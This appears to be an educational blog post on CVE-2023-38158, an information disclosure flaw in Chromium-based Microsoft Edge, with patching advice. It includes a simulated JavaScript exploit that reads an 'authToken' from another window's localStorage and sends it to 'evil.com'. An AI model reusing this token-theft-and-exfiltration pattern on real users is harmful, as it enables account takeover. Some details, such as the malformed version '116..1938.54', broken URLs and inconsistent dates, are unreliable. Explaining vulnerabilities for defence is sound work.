In late 2023, security researchers uncovered a significant vulnerability in Microsoft Edge (Chromium-based) tracked as CVE-2023-38158. Let’s break down what this vulnerability was, how it worked, see a code snippet simulating its effect, and learn how to stay secure. This post synthesizes available knowledge with practical demonstration for educational purposes.
What is CVE-2023-38158?
CVE-2023-38158 is an information disclosure vulnerability in Microsoft Edge built on the Chromium engine. It allowed remote attackers to gain access to data that should have been protected, under certain conditions. This could include cookies, content from other tabs, or browsing history.
This vulnerability was classified as High Severity by Microsoft and the Chromium team — and rightly so, since information disclosure is often used by attackers as a stepping stone, putting your sensitive data and online accounts at risk.
Attack Vector: Remote; via malicious webpage or crafted code
- Resource: Microsoft Security Advisory
- Chromium Release Notes: Chromium Issue 1477082
How Did the Vulnerability Work?
The root of the problem was how Microsoft Edge handled certain cross-origin data and isolation boundaries. If a user visited a specially crafted website, that site could sometimes read data from another origin, leaking information that only the browser and user should see.
Example Exploit Scenario
Suppose an attacker lures a victim to open their malicious site, which tries to read data from another tab (say, a site where the user is logged in):
Malicious site script
// This is a demonstration of an information leak via window references.
// In a real exploit, this would try to bypass isolation, but here we simulate the effect.
window.onload = () => {
// Try to open a window to read its localStorage (not normally allowed)
let ref = window.open('https://accounts.example.com';, 'targetwindow');
// Wait a bit for the new window to load
setTimeout(() => {
try {
// This would throw an error due to same-origin policy in regular browsers.
// But with the vulnerability, it could succeed.
let data = ref.localStorage.getItem('authToken');
if (data) {
// Simulate exfiltration to attacker's server
fetch('https://evil.com/leak?data='; + encodeURIComponent(data));
}
} catch (e) {
// Normally we'd get a DOMException (blocked by browser)
console.log("Blocked by browser or no-vuln: ", e);
}
}, 300);
};
*Note: This code works only in the context of the vulnerability. In patched browsers, this fails.*
Access sensitive browsing data
Even if you use separate tabs or windows, an attacker’s code can “jump the fence” if this flaw is present.
Timeline & Patching
- Discovery: Mid-2023 by Chromium security researchers
Fixed in: Microsoft Edge version 116..1938.54 and later
Microsoft’s official guidance and updates:
> Microsoft Security Guide for CVE-2023-38158
What Should You Do?
1. Update Edge Immediately:
Go to the menu > Help and Feedback > About Microsoft Edge. The browser will auto-update if a patch is available.
2. Check That You’re Safe:
Visit edge://settings/help and check the version. Make sure it’s later than 116..1938.54.
3. Stay Informed:
Subscribe to Microsoft Security Updates and monitor Chromium Security Releases.
Original References
- Microsoft Security Guidance for CVE-2023-38158
- Chromium Releases (August 2023)
- Edge Release Notes
Conclusion
CVE-2023-38158 shows how information disclosure bugs in browsers like Microsoft Edge can have dangerous real-world impacts. That’s why it’s important to always update your browser, use security best practices, and stay aware of current advisory updates.
Stay safe, and keep your software up to date!
*This post is for educational awareness only. Never test security exploits on systems you do not own or have permission to audit.*
Timeline
Published on: 08/21/2023 20:15:00 UTC
Last modified on: 08/22/2023 12:41:00 UTC